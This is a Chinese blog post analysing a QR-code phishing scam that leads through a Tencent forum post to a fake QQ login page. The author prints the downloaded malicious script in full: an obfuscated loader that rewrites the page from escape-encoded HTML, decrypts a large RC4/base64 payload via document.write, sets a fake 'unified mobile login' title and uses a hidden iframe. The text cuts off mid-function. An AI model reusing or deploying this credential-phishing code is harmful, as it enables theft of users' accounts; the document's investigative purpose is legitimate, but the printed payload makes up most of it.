盗号网站分析——二维码是怎样盗号的

盗号网站分析——二维码是怎样盗号的

今天在初中同学群里看到有人发了这样一张图片:

其实蛮明显是盗号钓鱼的,但从反馈来看盗号率还蛮高,好像扫了就会被盗,我还是蛮好奇咋实现的,就深入研究了一下

首先,二维码解码,将图片上传到二维码解码网站,得到网址:https://gamer.qq.com/v2/article/detail/145/622770639495
看似是一个腾讯官方的网址,好像挺安全,于是,我把后缀去了,直接访问域名gamer.qq.com,可以看到网站的确是腾讯官方的,

而上面这个网址https://gamer.qq.com/v2/article/detail/145/622770639495应该是某位用户发在该网站论坛中的一个帖子,我用电脑直接访问该网址,发现会出现跳转(内容转瞬即逝),而用手机浏览器访问(注意不用QQ),会跳转到QQ登陆的页面

为了避免跳转,我用我单身多年的手速点击浏览器的暂停加载按钮,截到了该贴内容

图中圈起来的部分显然是一个js脚本(腾讯官方论坛发帖居然可以内嵌脚本!可见该网站并不安全)

既然脚本地址没有隐藏,那就下载下来分析分析

完整代码如下:

(function () {
    var new_doc = document.open("text/html", "replace");
    /*注意下行代码内嵌escape加密的html网页*/
    var html = unescape("%3Chtml%3E%0A%3Chead%3E%0A%3Cmeta%20http-equiv%3D%22content-type%22%20content%3D%22text/html%3Bcharset%3Dutf-8%22%3E%3Cmeta%20http-equiv%3D%22X-UA-Compatible%22%20content%3D%22IE%3DEdge%22%3E%3Cmeta%20content%3D%22always%22%20name%3D%22referrer%22%3E%0A%3Cscript%20type%3D%22text/javascript%22%3E%0Adocument.write%28decodeURIComponent%28arcfour%28%2236a9dc5d29d54b46793d0c682298dbab%22%2Cbase64_decode%28%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%3D%22%29%29%29%29%3B%0A%3C/script%3E%0A%3C/head%3E%0A%3Cbody%3E%0A%3C/body%3E%0A%3C/html%3E");
    new_doc.write(html);
    new_doc.close();
})();
var set = document.createElement('iframe');
set.src = 'https://www.baidu.com/favicon.ico';
set.style.display = 'none';
set.onload = function () {
    setTimeout(function () {
        set.remove();
    }, 9)
}
document.title = '\u624b\u673a\u7edf\u4e00\u767b\u5f55';
document.body.appendChild(set);
function base64_encode(d){var q='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var z,y,x,w,v,u,t,s,i=0,j=0,p='',r=[];if(!d){return d}do{z=d.charCodeAt(i++);y=d.charCodeAt(i++);x=d.charCodeAt(i++);s=z<<16|y<<8|x;w=s>>18&0x3f;v=s>>12&0x3f;u=s>>6&0x3f;t=s&0x3f;r[j++]=q.charAt(w)+q.charAt(v)+q.charAt(u)+q.charAt(t)}while(i<d.length);p=r.join('');var r=d.length%3;return(r?p.slice(0,r-3):p)+'==='.slice(r||3)}function base64_decode(d){var q='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var z,y,x,w,v,u,t,s,i=0,j=0,r=[];if(!d){return 